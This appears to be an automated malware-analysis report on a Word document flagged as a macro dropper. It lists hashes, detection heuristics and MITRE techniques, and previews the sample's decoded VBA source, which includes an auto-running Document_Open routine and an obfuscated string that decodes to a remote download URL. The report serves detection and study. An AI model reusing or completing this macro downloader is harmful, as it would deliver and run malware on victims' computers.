Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6a8731db61becc77…

MALICIOUS

Office (OLE)

101.5 KB Created: 2016-05-31 21:59:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: de0977227bfa86f06065ed79b29f2460 SHA-1: e2ecc733b6ba89fa479bf56f79818253a078c510 SHA-256: 6a8731db61becc77dfab8f1d97d5839f816bd63f2267e7cd258a258b269e4d85
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The presence of CreateObject and CallByName calls further indicates the execution of arbitrary code. ClamAV detection as 'Doc.Dropper.Donoff-5743527-0' strongly suggests its malicious nature as a dropper. The VBA script's obfuscated nature prevents a detailed analysis of its specific actions, but the overall pattern points to a macro-based downloader.

Heuristics 7

  • ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19104 bytes
SHA-256: cb1ddb73da06febebf0a5877dc51319a3a1033d60bc7b44025ecafdd01d9de6e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub WyyWULWYSi(ByVal OBEdkizvIqANSj As String, ByVal iTcptNtitkX As Integer)
JBGCrVx True, "61wH1rFeSckSe4WmjgC", 9044
eklaYYxB "BqJ9zUcRjgcgRXBEcoKmoRJv88HLj", "EFyjiZ4NyH7nAqOXr"
XRTLmWclX
LFMitxQT = 6741
If tlwOUP("7uSQTjm0DKEmrUbeqOAlOqe3SA2XSf", 886, 440) Then
FVoXCU = 9024
Jfqiww
DeMBErMM 1883
qfmfnUhU = 3192
ogQaKhB "E7H3kjiKQlrB4uz4hY"
yxvDZxGOono = "4V9Prmqq5pp2T3boDTt53SgVtZp6FwX"
Else
VPqSaCwywvi 653, 5024, 4694
iVcFllAOL "XSzIiqG023tL0tBudBlk88rPScG3D", 9258
dLXNRHI
UDjzxhB = False
End If
End Sub
Private Sub gfKVhnpWu(ByVal XjlJlQPCcmrv As Integer)
zLRlicMtXXKlV "rOrKUsrEkpwsCCW33P41pQu8ZoooG", "0WaQ7ihJDYiixj5e3T6XklW4P7TxHqn", "WBbZEwbE7I4LWwSJRi7zx0Nln"
vHqrgNeYdpuy = 358
HTcopEWFEd
RdzhvqvlE = "xLVtiCYc7iFsaEsELLyxuwRS2Di"
If TZLddMcA(True, 55, True) Then
alkeJPfCbUMBdm = 4069
MeckKl 555, "z8MCplodnJF9rbC7h8GUk", 2131
dQGWuKA = "pDgH1VBPv1VycHgrWtVCcIFdtPlSYW"
wsMERaKf
Else
LscCUh
sDTkJvthsychG 9355
IAQqnKpk = "Hfn8wNq6VVqVQpYvlNlGkhUODToBp"
End If
End Sub
Private Sub Document_Open()
Dim plTZdPka As Integer
Dim ncigYiQhft As Boolean
jEvmGvhtVJWZ.kTCWjU
End Sub

Attribute VB_Name = "jEvmGvhtVJWZ"
Private Sub SPmuRuORMlor(ByVal HgIZusrEmlYCXQ As String, ByVal EBQLGMY As String)
FgpUGo "EGD1Z1OQJ8AZSdcOhhc"
xAfBi = "fB9G2pgh9CloiivBucrFwQojd2Wa"
qllxLM "dQgTZOvp02GroYMHMWLo62TWcsxzRY", "8ojFpr5Fio5WOJgO1pNLTO", True
End Sub
Private Sub SPIypoc(ByVal PpSewz As Integer, ByVal qdFDWQxu As String)
uAPgblLe 3110
jPjtiINzaY = 6371
CNDhphipo "A78Ku2RnJsbgaamys", "G6AkAjTKsKWIwp48BaH0ctXRvlKgDH"
IhvwV = True
LBgHikUSTuk
End Sub
Private Sub bVdQWOlL(ByVal ozcccogqQJ As String, ByVal QOBsDKJS As Boolean)
bqrshfOOnObQar
sJhKGp
AXJwRmSPOAkc
End Sub
Public Function mshXOCr(ByVal pEarGnj As String, ByVal TUvONr As String) As Object
Dim jRxEbKDa As Integer
Dim XCZIIIHPUk As String
Set mshXOCr = QFzYcmJViwYIP(CreateObject(pEarGnj))
End Function
Public Sub kTCWjU()
Dim VYJDCDbnTrw As String
Dim mPVZLmKXRSHyBt As Integer
On Error GoTo slDgQgrOOSTgn
ttVXuQ.YIuXEJoscsaj
ttVXuQ.MIYUXhxY
lMdfkjFy
Exit Sub
slDgQgrOOSTgn:
End Sub
Private Sub nsYPZNJ(ByVal fdgeL As String)
iUzhs = "KmYsR7JIDoubdQl14wrvbBok"
If AHuyFwATrHBOv Then
KPWbwiTHxKEiL False, "T5LdCaD3BwhlO844SJbShL2kXiAvn8"
fsfyAnHlp
LhbSRruW True
Else
CJAzEj 2123
End If
jFyGoZAutdqkGd "qhW0gCWZu7fR2FUiyWYD0lpxokEuO1", 972
End Sub
Private Function QFzYcmJViwYIP(ByVal wBCzXKPHCoZf As Object) As Object
Dim qvVvJqxo As Integer
Set QFzYcmJViwYIP = wBCzXKPHCoZf
End Function
Private Sub QvXwf(ByVal HnOErTetEaKlM As String, ByVal ZTutrQVKg As String, ByVal vravubiPvDRh As String)
Set vzvwrEQSoD = YovrSSgvMPJO.QceWTMEJaYLCQj(True, vravubiPvDRh)
YovrSSgvMPJO.MMhiDsZmghwW CfMkynEbhSr, 2670, "arguyw2nGgGkc6QAe5NL", vzvwrEQSoD
IGprEAKJAuxR.pugilrQ IyVrcDHGq.TaoElp(HBgZTg, vzvwrEQSoD, 8879), False, "cejo7MPw6YS1LmNofeBzpX", HnOErTetEaKlM
End Sub
Private Sub lMdfkjFy()
Dim VLjTCnVrJU As Boolean
QvXwf IGprEAKJAuxR.SxhCKi, "jh1u3B528NFiUmAXx8lNtG5R0EI", BnLAMbzZZAofvM
IGprEAKJAuxR.ukYSHemkFaQeJd False, 618, IGprEAKJAuxR.SxhCKi
End Sub
Private Function CfMkynEbhSr() As String
CfMkynEbhSr = BOKWxMMrFkr.iKBNbg("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function HBgZTg() As String
HBgZTg = BOKWxMMrFkr.iKBNbg("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function BnLAMbzZZAofvM() As String
BnLAMbzZZAofvM = BOKWxMMrFkr.iKBNbg("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function

Attribute VB_Name = "BOKWxMMrFkr"
Private Function eVoEHMFWcUs(ByVal LVWIVzceQWVK As Integer, ByVal yVbFEr As Integer, ByVal agcsvDDW As String, ByVal MYcew As String) As String
If Not FxqHauXhrNAYyw.YcJR
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.